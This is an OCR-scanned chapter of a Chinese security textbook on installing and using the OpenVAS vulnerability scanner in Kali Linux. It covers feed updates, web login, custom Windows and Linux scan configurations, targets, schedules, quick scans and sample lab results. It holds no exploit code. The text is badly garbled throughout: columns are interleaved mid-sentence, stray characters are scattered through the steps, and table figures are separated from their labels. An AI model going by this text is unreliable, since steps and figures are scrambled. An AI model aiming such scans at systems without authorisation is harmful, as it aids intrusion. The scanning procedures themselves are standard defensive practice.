下 图 为 截取 的 部 分 更 新 信息 。 


[> Updating OpenVAS feeds 
*] [1/3] Updating: NVT 
Bent 159,119 bytes received 12,217,759 bytes 575,668.74 bytes/sed 
Fotal size is 247 ,656,755 ei is 19.96 

[- ] [2/3] Updating: Scap D 

ent 328,324 bytes 人 4,213,608 bytes 259,538.97 bytes/sec 
Kotal size is 992.859,082 speedup is 218.60 

Lsr/sbin/openvasmd 

[*] [3/3] Updating: Cert Data 

sent 22,771 bytes received 134,431 bytes 34,933.78 bytes/sec 
total Size is 55,172,448 speedup is 356.97 

/usr/sbin/openvasmd 


Firefox has not connected to this website. 


Learn more... 


pour connection is not securg 


The owner of 127.0.0.1 has configured their website improperty. To protect your information from being stolen, 


Report errors like this to help Mozilla identify and block malicious sites 
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12.4.2 ”登录 OpenVAS 


安装 完 OpenVAS 软 件 ， 并 设置 好 账号 
密码 后 ， 便 可 以 登录 OpenVAS。OpenVAS 
采用 Web 登 录 ， 管 理 起 来 非常 方便 。 初 次 登 
录 OpenVAS 需 要 一 些 简单 的 设置 ， 具体 的 
设置 步骤 如 下 : 
OpenVAS 启 动 后 会 打开 一 些 939 系 列 
端口 。 使 用 netstat -pantu | grep 939 命 令 查 看 
端口 信息 并 过 滤 出 939 系 列 端口 ， 执 行 效果 
如 下 图 所 示 。 其 中 9390 是 OpenVAS 服 务 端 
口 ，9392 是 Web 登录 端口 。 


kp 001 netstat -pantu | grep 939 : 


cp 0 0 127.0.0.1:93909 0.0.0.0:*+ LISTEN 6512/0penvasm 
cp 90 0 127.0.0.1:9392 0.0.0.0:#+ LISTEN 6510/gsad 


如 果 9392 端 口 开 放 ， 便 说 明 OpenVAS 
的 服务 已 经 启动 ， 通 过 浏览 器 可 以 登录 Web 


页 面 ， 初 次 登录 会 有 警告 信息 ， 如 下 图 
所 示 。 


Advanced 


这 是 由 于 OpenVAS 采 用 HTTPS 加 窗 传 输 协 议 ， 因 此 会 提示 安装 证 书 问题 ， 


这 时 需 在 


警告 信息 界面 中 单 击 Advanced 按 钮 ， 进 入 下 图 所 示 的 界面 。 


127.0.0.1:9392 uses an invalid security certificate. 


The certificate Is not valid for the name 127.0.0.1. 


Error code: SEC_ERROR_UNKNOWN _ISSUER 


The certificate is not trusted because the issuer certificate is unknown. 
The server might not be sending the appropriate intermediate certificates. 
An additional root certificate may need to be imported. 


Add Exception... 


人 @ 注 意 : 如 果 是 本 机 登录 可 以 使 用 https:// 127.0.0.1:9392/ 进 行 登录 。 


单 击 Add Exception 按 钮 ， 会 弹出 一 个 确认 添加 证 书 的 


村 


月 攻 ， 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


Add Security Exception @ 


You are about to ovarride how Firefox identifies this site. 
Legitimate banks, stores, and other public sites will not ask you to do this. 
Server 


Location: https/1127.0. 国 列国 Get Certificate | 


Certificate Status 
This site attempts to identify itself with invalid information. ] 


View.- | 


WrongSite 


The ccrtificatc bclongs to a diffcrcnt sitc, which could mcar that somconc is trying to impcrsonatc this sitc. 
Unknown ldentity 


The certiflcate is not trusted because it hasn’t been verifledas issued by a trusted authority using a secure signature. 


Permanently store this exception 


] Confirm Security Exception | ] Cancel | 


单 击 Confirm Security Exception 按 钮 ， 确 认 添 加 安全 证 书 ， 并 跳 转 到 下 图 所 示 的 登录 
界面 ， 在 其 中 输入 管理 员 账 号 与 密码 。 


Username: 
(4 


Greenbona, 
Security 
Assistant 


Password: 


单 击 Longin 按 钮 ， 进 入 下 图 所 示 的 主 界面 。 


xtrae Adrministration 


人 税 注 意 : 如 果 系统 重启 后 ， 默 认 OpenVAS 不 自动 启动 ， 需 要 手动 开启 。 手 动 开 启 的 命令 
为 openvas-start， 执 行 效 有 果 如 下 图 所 示 。 


root@kali:~# openvas-start 

[*] Please wait for the OpenVAS services to start. 

[*] 

[*] You might need to refresh your browser once it opens. 
[*] 

[*] Web UI (Greenbone Security Assistant): https://127.0.0.1:9392 


12.4.3 ”配置 OpenVAS 
登录 OpenVAS 后 ， 便 可 以 配置 相关 扫描 信息 ，OpenVAS 提 供 了 丰富 的 配置 选项 ， 既 可 
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以 配置 快速 扫 摘 选项 ， 也 可 以 手动 配置 个 
性 化 扫描 选项 。 下 图 为 OpenVAS 框 架 的 运 
行 示 意图 。 

SOpenVAsS 


Scan Targets  、 


大 致 分 为 以 下 几 个 组 件 : 

e _ Scanner 组件: 用 于 扫描 ， 它 会 从 
NVT 数 据 库 中 提取 漏洞 信息 。 

e Manager 组 件 : 用 于 管理 Scanner 组 
件 ， 所 有 的 配置 信息 保存 在 Configs 
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首次 登录 OpenVAS， 可 以 修改 一 些 基 
本 信息 。 操 作 步 骤 如 下 : 
在 OpenVAS 首 页 中 ， 选 择 Extras 菜 单 ， 
在 打开 的 菜单 列表 中 选择 My Settings 菜 单 合 
令 ， 如 下 图 所 示 。 


Performance 


CVSS Calculator 


Feed Status 


都 可 以 找到 一 个 类 似 扳 手 的 图 标 ， 如 下 图 
所 示 。 


数据 库 中 。 % 
。 CLI 组 件 ， 指令 控制 组 件 ， 用 于 对 | 
Manager 下 达 指 令 。 单 击 扳手 图 标 ， 进 入 基本 设置 修改 页 
e@ Security Assistant 组 件 : 用 于 分 析 扫 ， 面 ， 如 下 图 所 示 。 在 这 里 可 以 修改 时 区 、 
描 漏洞 并 生成 报告 文档 。 用 户 密 码 以 及 语言 环境 等 。 
Edit My Settings 
Ce ED 
一 
Password 
New 


User Interface Language 


Rows Per Page 10 
Details Export File Name %T-%U 
List Export File Name 96T9%D 
Report Export File Name %T-%U 


Severity Class 


Dynamic Severity | No 


NVD Vulnerability Severit... ™ 


” 


Default Severity ] 10.0 


默认 情况 下 ，OpenVAS 的 漏洞 评测 标准 是 NVD 模 式 ， 如 果 需 要 修改 ， 可 以 单 南 
Severity Class 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 选择 不 同形 式 的 评分 标准 ， 如 下 图 所 
示 ， 其 中 包括 BSI、OpenVAS、PCI-DSS 等 标准 。 
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NVD Vulnerability Severity 单列 表 中 选择 Scan Configs 菜 单 命令 ， A 下 


Details Export File Name Rotngs 一 
图 所 示 。 


BSI Schwachstellenampel 
List Export File Name (Germany) 


OpenVAS Classic 
Report Export File Name 


PCI-DSS 
Severity Class NVD Vulnerability Severit... < Targets 
Port Lists 
[step 图 设置 完成 后 ， 单 击 下 方 的 Save 按 
人 2 7 用 本 Credentials 


钮 ， 即 可 保存 设置 ， 并 退出 基本 设置 修改 
页 面 。 


打开 Scan Configs 对 话 框 ， 在 其 中 可 
12.4.4 ” 自 定 义 扫描 以 查看 DOpenVAS 的 默认 扫描 配置 项 ， 如 下 


ee 图 所 示 ， 包 括 Discovery (发 现 型 打 描 ) 、 
默认 情况 下 ct da empty〈 一 个 空 的 扫描 ) 、Full and fast〈 完 
Re 的 ， 整 的 快速 打 描 ) 、Full and fast ultimate 〈 完 
针对 茶 些 特定 的 设备 进行 扫描 ， 则 需要 日 整 快速 极限 扫描 ) 、Full and very deep〈 非 
定义 配置 。 第 深度 扫描 ) 、Full and very deep ultimate 
1 设置 扫描 配置 (深度 极限 扫描 ) 、Host Discovery (主机 


发 现 扫 描 ) 、System Discovery (系统 发 现 
开始 扫描 之 前 需要 先 设 置 一 个 扫描 配 “扫描 ) 等 ， 除 此 之 外 还 可 以 看 到 每 个 扫描 


置 ， 创 建 自 定义 扫描 配置 的 操作 步骤 如 下 : ”配置 的 漏洞 分 类 以 及 NVT 数 量 。 
选择 Configuration 菜 单 ， 在 打开 的 菜 


a Scan Configs (8 of 8) 

Name 

DD scan configuration.) 加 1 四 2373 加 日 加 
ee and static Configuration template.) 0 4 D bb 国 园 台 日 
ra by using previously collected information.) 袜 62 GG 48034 加 回国 [| 
ee that can stop services/hosts; optimized by using previously collected information.) 62 本 48034 而 国 回 器 昌 
Ee i previously collected information; slow.) 到 62 站 48034 加 国 园 电 日 
pt can stop services/hosts; don't trust previously collected information; slow.) 全 62 i 48034 而 国 加 晤 蝇 
Pe scan configuration.) 9 2 四 :> 巴 国 盏 局 
ea Ce scan configuration.) 加 四 29 马 回 思 口上 


step 加 单 去 左上 方 的 “创建 ” 图标， 可 以 创 [step 轿 输入 完成 后 ， 单 击 Create 按 钮 ， 进 入 
建 自 定义 配置 ， 如 下 图 所 示 。 编辑 扫描 配置 界面 ， 如 下 图 所 示 。 


New Scan Config 
& Name Windows-scanl 
一 Scan Configs 


Comment 


打开 New Scan Config 对 话 框 ， 在 其 中 Ne 0 
输入 新 建 扫 描 的 名 称 、 备 注 信 息 以 及 基础 
配置 ， 如 下 图 所 示 。 Lereate | 


在 Family 选 项 中 有 两 个 单 选 按钮 ， 其 
ee 中 第 1 个 是 箭头 向 上 的 图 标 ， 选 中 它 代 表 如 


Base  (e) Empty static and fast 果 后 续 有 漏 疝 更 新 自 动 加 入 扫 描 配置 》 箭 
ee 头 向 右 的 图 标 如 果 选 中 ， 代 表 仅 当前 这 些 
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配置 项 ， 即 使 后 续 有 更 新 也 不 自动 添加 ， 
如 下 图 所 示 。 这 里 建议 选择 第 1 项 ， 如 有 特 
殊 需 要 可 以 选择 第 2 项 。 


Famiy 令 国 O® 


因为 这 里 的 配置 是 针对 Windows 系 
统 的 漏洞 扫描 ， 因 此 会 去 除 一 些 不 必要 的 
漏洞 扫描 。 配 置 项 1 如 下 图 所 示 ， 其 中 包 
括 Brute force attacks ( 骏 力 破解 ) 、Buffer 
overflow (缓冲 区 溢出 ) 、Compliance ( 合 
规 性 ) 、Databases (数据 库 ) 等 。 


NVTs selected Selest all NVTs 
AIX Local Security Checks 0 of1 FO 
Amazon Linux Local Security Checks 0 of 749 FO 
Brute torce attacks Qof9 FO 可 
Buffer overlow 0 of 562 Ol 杏 
CISCO 0 of647 FO 
CentOS Local Security Checks 0 of2471 TO 
Citrix Xenserver Local Security Checks 0 of 30 FO | 
Compliance 0 of7 Boom MM 
Databases 0 of 550 Ol 可 


配置 项 2 如 下 图 所 示 ， 其 中 包括 
Default Accounts (默认 账户 ) 、Denial 
of Service〈 拒 绝 服务 ) 、FTP (FTP 服 务 
器 ) 、Finger abuses (滥用) 、Gain a shell 
remotely 〈 远 程 获取 shell) 、General (通用 
性 ) 等 。 


befault Accounts 0 of 216 [FIO | 国 
Denial of Service 0 of1356 FO ca 
F5 Local Securlty Checks 0 of125 加 ed 
—p 0 of173 FO 器 | 
Fedora Local Security Checks 0 of 10616 FO 
Finger abuses 0 of6 FO [|] 
Firewalls 0 of18 FO 
FortiOS Local Security Checks 0 of 34 FO ca 
FreeBSD Local Security Checks 0 of 437 FO 
Gain a shell remotely 0 of 106 FO 
Beneral 0 of 4299 FO 


配置 项 3 如 下 图 所 示 ， 其 中 包括 
Malware 〈 恶 意 软 件 ) 、Nmap NSE (Nmap 
脚本 ) 、Nmap NSE net (Namp 网 络 脚本 ) 、 
Peer-To-Peer File Sharing 〈 点 对 点 文件 共 
享 ) 、Policy (策略 ) 、Port scanners ( 端 
口 打 描 ) 、Privilege escalation 〈 提 权 ) 、 
Product detection (产品 检测 ) 、RPC 等 。 
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Maiware 0of50 Ol | [7] 
Mandrake Local Security Checks 0of402 FO 
Netware 00T8 IO 一 
Nmap NSE 0of154 FIO 回 
Nmap NSE net 0of177 POL 
Pracle Linux Local Security Checks 0 of 1895 Ol~+| 口 
Palo Aito PAN-OS Local Securlty Checks 0 of40 FO 
Peer-To-Paer File Sharing 0of21 FO 回 ca 
Policy 0 of656 加 Oa 
Port scanners 0 of15 FO 男 
privilege escalation 0of60 FO | 
product detection 0 of 2059 FO 
RPC 0 of11 IO 加 


配置 项 4 如 下 图 所 示 ， 其 中 包括 Remote 

file access〈 远 程 文件 访问 ) 、SMTP problems 
(SMTP) 、SNMP (SNMP) 、SSL and TLS 
(SSL 和 TLS 协 议 ) 、Service detection (服务 

检测 ) 、Settings (设置 ) 、Useless services 
(无 用 的 服务 ) 等 。 


Remote file access 0of58 [Ol | 
BMTP problems 0 of52 FO 
BNMP 0 of7 FO 
SSL and TLS 0 of63 FO 加 eal 
Bervice deteciion 0 of217 FO 
Betings 0 of12 FO 加 
Slackware Local Security Checks 0 of534 FO 
Bolaris Local Security Checks 0 of1 FO 
BuSE Local Security Checks 0 of 1426 FO 
bbuntu Local Security Checks 0 of3119 PIO 
Jseless services 0 of14 FO 本 ca 
MMware Local Security Checks 0 of58 FO 
MWeb Servers 0 of 400 Ol 


配置 项 5 如 下 图 所 示 ， 其 中 包括 
Windows 以 及 Windows:Microsoft Bulletins 
(微软 公告 ) 等 。 


indows 0of181 Ol | 
indows : Microsoft Bulletns 0 of1967 FO i 
otal: 0 0of0 


设置 完成 后 ， 单 击 Save 按 钮 保存 配 
置 ， 再 返回 界面 的 下 方 ， 可 以 看 到 已 经 
添加 了 和 上 自 定义 扫描 项 ， 具 体 信 息 包 括 27 项 
19059 种 漏洞 ， 如 下 图 所 示 。 至 此 ， 便 成 功 
创建 了 针对 Windows 系 统 的 扫描 配置 。 


ost Discovery 区 
Network Host Discovery scan configuraticon.) 2 = 2 md 国 国 加 加 
ystem Discovery 区 9 
(Network System Discovery scan configuration.) 8 -< = 团 轩 马 加 
ndwos-scan 
Empty and static configuration tem plate.) 2 = 19059 ms 日 回忆 中 


全 注意 : 自 定 义 扫 描 项 的 右 侧 提供 了 删 
除 、 修 改 、 复 制 、 导 出 功能 ， 默 认 配 置 项 
是 不 可 以 删除 和 修改 的 。 


pA | 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


2. 创建 扫描 对 象 建 > 图 标 ， 创 建 目标 对 象 如 下 图 所 示 。 
开始 漏洞 扫描 之 前 需要 确定 扫描 对 象 ， “ 


而 OpenVAS 中 任何 的 动作 都 需要 提前 进行 四 
配置 。 创 建 扫描 对 象 的 操作 步骤 如 下 : 全 
选择 Configuration 菜 单 ， 在 打开 的 Targets 


菜单 列表 中 选择 Targets 菜 单项 ， 如 下 图 打开 New Target 对 话 框 ， 在 其 中 输入 


所 示 。 目标 名 称 ， 如 下 图 所 示 。 目 标 地 址 有 两 种 
方式 : 
一 4 一 一 一 一 (1) 选择 Manual 项 ， 可 以 直接 输入 IP 地 
Port Lists 址 ， 多 地 址 之 间 使 用 各 与 分 隔 。 
Credentials (2) 选择 From file 项 ， 可 以 将 需要 打 描 的 
scan Configs 


IP 地 址 保存 成 文件 ， 最 后 导入 该 文件 。 
[step 图 在 打开 的 界面 中 ， 单 击 左 上 角 的 “ 创 
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Name Winodw-PC1 
Comment 
(©) Manual ] 192.168.1.103 
Hosts DO) From file | Browse.. | No file selected. 
选择 需要 扫描 的 端口 ， 这 里 提供 了 | AILIANA assigned TCP 20... ^ 


非常 多 的 选项 ， 有 和 针对 TCP/UDP 的 单独 选 
项 ， 还 有 针对 常用 端口 的 选项 以 及 全 端口 


Alive Test ] 


Credentials for authenticated Ss 
扫描 等 。 这 时 可 以 单 击 下 拉 按 钮 ， 在 弹出 All TCP 
的 下 拉 列 表 中 进行 选择 ， 如 右 图 所 示 。 这 | All TCP and Nmap 5.51 
里 选择 OpenVAS Default 选 项 ， 当 然 如 果 想 。 人 
自 定义 端口 ， 也 可 以 单 击 右 侧 的 “创建 > ES TOP and top 100 UDP 
图 标 自 行 创 建 。 OpenVAS Default 
主机 探测 也 同样 提供 了 丰富 的 选项 ， Port List OpenVAS Default ~ | 回 
这 里 选择 Consider Alive 选 项 ， 即 使 主机 不 Alive Test Consider Alive 


响应 探测 数据 包 》 也 依然 认为 主机 是 存活 Credentials for 
状态 ， 并 完成 扫描 ， 如 右 图 所 示 。 ee 


[step 图 基本 选项 都 设置 完成 后 ， 单 击 Create 按 钮 ， 即 可 完成 创建 。 在 返回 的 页 面 中 可 以 看 
到 已 经 创建 好 的 主机 列表 ， 如 下 图 所 示 。 


的 se (1 of 1) 


ps Port List Credentials . sort by 


Windwos-PC1 192.168.1.103 1 OpenVAS Default 
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多 注意: 在 Configuration 菜 单列 表 中 有 一 个 Port Lists 菜 单 ， 通 过 这 个 菜单 可 以 修改 扫描 的 
端口 。 修 改 后 的 端口 列表 如 下 图 所 示 。 


Port Lists (9 of 9) 
国 图 1-，o: 国 国 
Port Count 
二 EC 
AIl IANA assigned TCP 2012-02-10 国 5625 5625 0 回 男 名 加 
AIl IANA assigned TCP and UDP 2012-02-10 国 10988 5625 5363 轩辕 加 四 
All privileged TCP 1023 1023 0 辐 罗 加 加 
All privileged TCP and UDP 师 2046 1023 1023 国 轩 加 四 
All TCP 区 65535 65535 0 同 了 车 品 丁 
All TCP and Nmap 5.51 top 100 UDP 65634 65535 99 轩辕 加 町 
All TCP and Nmap 5.51 top 1000 UDP 66534 65535 999 图 古 马丁 
Nmap 5.51 top 2000 TCP and top 100 UDP 图 2098 1999 99 国 罗 加 四 
OpenVAS Default 4481 4481 0 卓 园 思 四 
3. 创建 扫描 任务 


设置 完 自 定义 扫描 配置 并 创建 好 扫描 对 象 后 ， 接 下 来 便 可 以 创建 一 个 扫描 任务 。 
OpenVAS 的 扫描 任务 设置 也 是 非常 的 灵活 ， 可 设 定 在 规定 的 时 间 进 行 扫 描 ， 也 可 设置 周期 
性 扫描 ， 这 样 更 加 符合 漏洞 管理 的 要 求 。 创 建 扫 拉 任 务 的 操作 步骤 如 下 : 
创建 一 个 扫描 调度 计划 ， 选 择 在 打开 的 界面 中 ， 单 击 左上 角 的 “ 创 
Configuration 菜 单 ， 在 打开 的 菜单 列表 中 选 ” 建 ”图 标 ,创建 一 个 扫描 任务 ， 如 下 图 所 示 。 


择 Schedules 菜 单项 ， 如 下 图 所 示 。 加 丁 
Schedules 
打开 Edit Schedules 对 话 框 ， 在 其 中 可 
Rr ari 以 设置 调度 的 名 称 ， 可 以 选择 初次 扫描 的 
了 时 间 ， 还 可 以 选择 以 后 计划 扫描 的 时 间 ， 
如 下 图 所 示 。 


Edit Schedule 


Name everyday Scan 


Comment 


First Time Tuesday, 30 October, 2018 Eat 国 L lo 轿 " 


Timezone Coordinated Universal Time Y 


hour(s) MW 


Period 


Duration 


step 加 设置 完成 后 ， 单 击 Save 按 钮 ， 在 返回 的 界面 中 可 以 看 到 刚刚 设置 的 调度 任务 ， 如 下 
图 所 示 。 
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Schedules (1 of 1) 


everyday _scan Tue Oct 30 03:10:00 2018 UTC Wed Oct 31 03:10;0 2018 UTC 1 day 5 hours 辣 国 四 四 
vAPpply to page contents v 回回 


[Applied filter: rows=10 first=]1 sort=name) l1-1of1 


step 图 选择 Scans 菜 单 ， 在 打开 的 菜单 列表 ， step 图 在 打开 的 界面 中 ， 单 击 左上 角 的 “ 创 
中 选择 Tasks 菜 单项 ， 如 下 图 所 示 。 建 ” 图 标 ， 创建 一 个 扫描 任务 ， 如 下 图 所 示 。 


Reports 


Results 


打开 New Tasks 对 话 框 ， 在 其 中 可 以 设置 扫描 任务 的 名 称 ， 还 可 以 调用 之 前 创建 好 的 
调度 配置 、 扫 描 配 置 等 ， 如 下 图 所 示 。 


1 


Name New Scan 


Comment 
Scan Targets | Windwos-PC1 | 加 
Alerts | 
Schedule | everyday _ scan Y once 加 
Add results to  (e) yes no 
Assets 
Apply Overrides (e) yes no 
we 。 
Alterable Task yes (e) no 


Auto Delete (e) Do notautomatically delete reports 


Reports 
Automatically delete oldest reports but always keep newWest reports 


Scanner OpenVAS Default 二 


scan Config Windwos-Scan 


[step 较 设置 完成 后 ， 单 击 Save 按 钮 ， 在 返回 的 界面 中 可 以 看 到 刚刚 设置 的 扫描 任务 ， 如 下 
图 所 示 。 


epors yy |Sovort ET 
everity ren 
| 


New Scan 加 加 回 因 局 已 


vApply to page contents ™ 回回 


Applied filter: min qod=70 apply overrides=] rows=10 first=] sort=name 1-1of1l bel 


人 @ 注 意 : 右 侧 的 时 钟 图标 可 以 修改 调度 计划 ， 类 似 播 放 按钮 可 以 在 计划 启动 后 停止 当前 
扫描 任务 。 


4. Linux_Unix 扫 摘 配 置 
前 面 学 习 了 如 何 创 建 目 定义 扫描 ， 这 里 再 给 出 一 个 目 定 义 Linux 系 统 的 扫描 配置 ， 相 
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信 经 过 这 两 种 系统 的 配置 ， 读 者 一 定 能 
掌握 创建 自 定义 扫描 配置 的 方法 。 

创建 Linux 扫 描 配置 也 需 dl 
一 些 步骤 ， 这 里 省 去 了 相同 的 步骤 ， 
出 最 终 的 配置 项 ， 所 需 步 又 如 下 : 
通过 新 建 扫描 配置 ， 也 可 以 通过 复制 
已 有 的 扫描 配置 进行 修改 。 这 里 选择 复制 
已 有 的 扫描 配置 进行 修改 ， 在 扫描 配置 页 
中 选择 左 侧 的 复制 图 标 ， 在 打开 Edit Scan 
Config 对 话 框 中 输入 扫描 配置 名 称 ， 如 下 图 
所 示 。 


Edit Scan Config 


Linux_Unix_Scan 


Name 


Comment Most NVTS; optimized by using previous 


Edit Network Vulnerability Test Families 
Linux 配 置 项 1， 如 下 图 所 示 。 


AIX Local Security Checks 1of1 
Amazon Linux Local Security Checks 748 of 748 l 
Brute force attacks 9of9 (OA 
Buffer overilow 562 of 562 On 
CISCO 647 cf 647 Ong 加 | 


Ar 


2471of 2471 [| 严 图 
30 of30 Onlg 


Compliance 7of7 [| 严 图 


550 of 550 | 二 全 


如 下 图 所 示 。 


CentOSs Local Security Checks 


KK] [E 


Citix Xenserver Local Security Checks 


区 男 


Databases 


Linux 配 置 项 2， 


El 


Debian Local Security Checks 2830 of 2830 On@~ 
Default Accounts 216 of 216 On@~ 
Denial of Service 1356 of 1356 On@~ 
F5 Local Security Checks 125 of 125 On@~ 图 
FTP 173 of173 On@= 
Fedora Local Security Checks 106160f10616 -WOES 
Finger abuses 6of6 OFF” 
Firewalls 18 of 18 On 加 
FortiOS Local Security Checks 34of34 O@= 加 | 
FreeBSD Local Security Checks 437 of437 On@~ 
Gain a shell remotely 106 of 106 On@~ 
General 4298 of 4299 OO ] 
Gentoo Local Security Checks 693 of 693 Od 
HP-UX Local Security Checks 15 of 15 OO= 


Linux 配 置 项 3， 如 下 图 所 示 。 
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IT-Grundschutz 
IT-Grundschutz-10 
IT-Grundschutz-11 
IT-Grundschutz-12 
IT-Grundschutz-13 
IT-Grundschutz-15 

JUuNOS Local Security Checks 
Mac OS X Local Security Checks 
Mageia Linux Local Security Checks 
Malware 

Mandrake Local Security Checks 
Netware 

Nmap NSE 


Nmap NSE net 


Linux 配 置 项 4， 


Oracle Linux Local Security Checks 
Palo Alto PAN-OS Local Security Checks 
Peer-To-Peer File Sharing 

Policy 

Port Scanners 

Privilege escalation 

Product detection 

RPC 

Red HatLocal Security Checks 
Remote fle access 

SMTP problems 

SNMP 

SSL and TLS 


Service detection 


Linux 配 置 项 5， 


Settings 

Slackware Local Security Checks 
Solaris Local Security Checks 
SuSE Local Security Checks 
Ubuntu Local Security Checks 
Useless services 

VMware Local Security Checks 
Web Servers 

Web application abuses 
Windows 


Windows : Microsoft Bulletins 


Total’ 62 


5. 快速 扫描 


109 of 109 


91 of 91 


102 of 102 


85 of 85 


85 of 85 


85 of 85 


136 of 136 


193 of 193 


329 of 329 


50 of 50 


402 of 402 


8 of8 


154 of 154 


177 of 177 


On 


OF 


OF 


如 下 图 所 示 。 


1895 of 1895 


40 of 40 


21 of 21 


656 of 656 


20f15 


60 of 60 


2059 of 2059 


11 of 11 


1574 of 1574 


58 of 58 


52 of 52 


7of7 


63 of 63 


216 of 217 


On 


OF 


如 下 图 所 示 。 


12 of 12 


534 of 534 


1 ofl 


1426 of 1426 


3119 of 3119 


14 of 14 


58 of 58 


400 of 400 


5654 of 5655 


181 of 181 


1967 of 1967 


48034 of 48050 


On 


OF 


O0000GUUGUGUOUUU CG 


K] KK] Kl] KK] [(: 


<] KK] KK] KK] KK]) KK] [< 


< KK KK Kl KK KK 0] K Kl Kl 


OK EK KK Kl KK Kl KK K 


除了 自 定义 扫描 外 ，OpenVAS 还 提供 


了 一 个 快速 扫 拉 设 置 ， 


输入 一 个 主机 地 址 


便 可 以 开始 快速 扫描 。 进 行 快速 扫描 的 操 


作 步 又 如 下 : 
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在 创建 扫描 任务 界面 中 有 一 个 魔法 棒 图 标 较 ， 如 下 图 所 示 。 


[step 轿 单 去 魔法 棒 图 标 较 ， 便 可 以 进入 快速 扫描 设置 界面 。 在 I 了 地 址 栏 中 输入 一 个 主机 地 
址 ， 如 下 图 所 示 。 


Task Wizard 3 


Quick start: Immediately Scan an IP address 
IP address or hostname: 
192.168.1 .103 


The default address Is elther your computer or YOUT network gateway. 
As a short-cut | will do the following for you: 


1 Create a new Target 

2 Create a new Task 

3. Siart thls SCan task rlght away 

4. Switch the View to reload every 30 seconds so You can lean back and watch the scan progress 


In fact, you must not lean back. As soon as the scan progess is beyond 1%, you can already jump into 
the Scan report via the link in the Reports Total column and review the results collected so far. 


When creating the Target and Task | will use the defaults ss configured in “My Settings" 


By clicking the New Task icon 回 you can create a new Task yourself. 


单 击 Start Scan 按钮 ， 便 可 以 开始 一 个 快速 扫描 。 此 时 在 扫描 任务 列表 中 便 会 有 一 个 
已 启动 的 扫描 计划 ， 如 下 图 所 示 。 


Severity 图 |Trend 


Immediate scan of IP 192.168.1.103 0 (1) 四 四 辐 园 思 癌 
单 击 左 侧 name 中 的 名 称 ， 可 以 打开 快速 扫描 中 给 出 的 配置 项 ， 如 下 图 所 示 。 


i Immediate scan of IP 192.168.1.105 


Name: Immediate scan of IP 192.168.1.105 
Comment: 

Target: Target for immediate scan of IP 192.168.1.105 
Alerts: 

schedule: (Next due: over) 

Add to Assets: yes 


Apply Overrides: yes 
Min QoD: 70% 


Alterable Task: no 
Auto Delete Reports: Do not automatically delete reports 
Scanner: OpenVAS Default (WYpe: OpenVAS Scanner) 


Scan Config: Full and fast 
Order for target hosts: N/A 
Network Source Interface: 
Maximum concurrently executed NVT per host: 10 
Maximum concurrently scanned hosts: 30 
Status: oe ee 
Duration of last scan: 
Average scan duration: 


Reports: 1, Current: Oct 30 2018 (Finished: 0) 
Results: 10 

Notes: 0 

IDverrides:- 0 


12.4.5 ”结果 及 其 他 


通过 前 面 的 学 习 相 信 读 者 已 经 可 以 配置 并 开局 一 个 扫描 了 ， 下 面 介 绍 OpenVAS 中 扫描 
结果 以 及 一 些 其 他 功能 。 
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1. 扫描 结果 

当 扫 描 进 行 到 一 定 程 度 ， 不 但 可 以 看 到 扫描 的 进度 状态 ， 还 可 以 查看 目前 已 经 扫描 出 
的 结果 。 查 看 扫描 结果 的 操作 步骤 如 下 : 
在 扫描 任务 列表 中 Status 项 ， 指 出 了 当前 扫描 的 进度 ， 如 下 图 所 示 。 


Status severity ”图 | Trend 
局 二 


Immediate scan of IP 192.168.1.105 


0 (]) 口 四 回回 风口 
vApply to Page contents ™ 加 可 


step 加 单 击 Status 中 的 扫描 进度 ， 便 可 以 打开 Report: Results 界 面 ， 如 下 图 所 示 。 该 界面 会 
按照 漏洞 威胁 程度 进行 排列 。 


1D: C3711060-0794-44f6-8366-cBdeDeDA8065| 
Nodified 


es | Report: Results (10 of 100) Created: Tue Oct 30 04:23:23 2018 


Owner: admin 


1 -10 of 10 


onentiy 四 | 旭 |:vein 加 oopltet ocation]actions_ 


Check for rlogin Service 3 70% 192.168.1.105 513/tcp 因 畏 
UnreallRCd Authentication Spoofing Vulnerability 局 80% 192.168.1.105 6667/tcp 因 轴 
Anonymous FTP Login Reporting 80% 192.168.1.105 21itcp 因 攀 | 
Check if Mailserver answer to VRFY and EXPN requests LI 99% 192.168.1.105 25itcp 国 敲 
S55L/TL5: Deprecated 55Lv2 and 55Lv3 Protoco| Detection 是 98% 192.168.1.105 5432/tcp 园 畏 
S55L/TL5; Deprecaled 55Lv2 and 55Lv3 molocol Delec Livn 闪 J 396% 192.168.1.105 25ILcp 园 轩 
下 RSA Temporary Key Handling 'RSA EXPORT Downgrade Issue 口 情 EUIZTON 30% 192.168.1.105 25ftcp 因 转 
SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure 加 ETT 80% 192.168.1.105 5432/tcp 园 南 


Vulnerability (POODLE) 


SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure 加 TIT 30% 
Vulnerability (POODLE) 


SSH Weak MAC Algorithms Supported 95% 192.168.1.105 22ftcp 加 高 


192.168.1.105 25ftcp  ” 园 国 


[Applied filter:autofp=0 apply overides=] notes=] overrides=] result hosts only=1 first=] rows=]100 sort-reverse=severity levels=hml 1- 10 of 10 
min god=70) 


[sep 图 单 击 Vulnerability 中 的 任意 一 项 ， 可 以 打开 该 漏洞 的 简要 信息 ， 如 下 图 所 示 。 其 中 包 
括 该 漏洞 的 一 个 简要 报告 、 存 在 的 位 置 、 威 胁 程度 以 及 修复 建议 等 。 


Vulnerability Location Actions 
phpinfo() output Reporting 80% 192.168.1.105 80/tcp 马 击 
Summary 


Many PHP installation tutorials instruct the user to create a file called phpinfo.php or similar containing the phpinfo() statement. Such a file s 
often left back in the webserver directory. 
Vulnerability Detection Result 


The following files are calling the function phpinfo{() which disclose potentially sensitive information: 


http://192.168.1.105/mutillidae/phpinfo.php 
http://192.168.1.105/phpinfo.php 


Impact 

some of the information that can he gathered from this file incliides: 

The username of the user running the PHP process, if it is a sudo user, the IP address of the host, the web server version, the system version 
(Unix, Linux, Windows, ...), and the root directory of the web server. 

Solution 

solution type: Ws Workaround 

Delete the listed files or restrict access to them. 

Vulnerability Detection Method 

Details: phpinfo() output Reporting (OID: 1.3.6.1.4.1.25623.1.0.11229) 

Version used: $Revision: 11992 $ 


人 疙 提示 : 扫描 出 的 漏洞 并 不 完全 准确 ， 需 要 后 续 的 验证 ， 如 果 确 实 存在 可 以 使 用 漏洞 列 
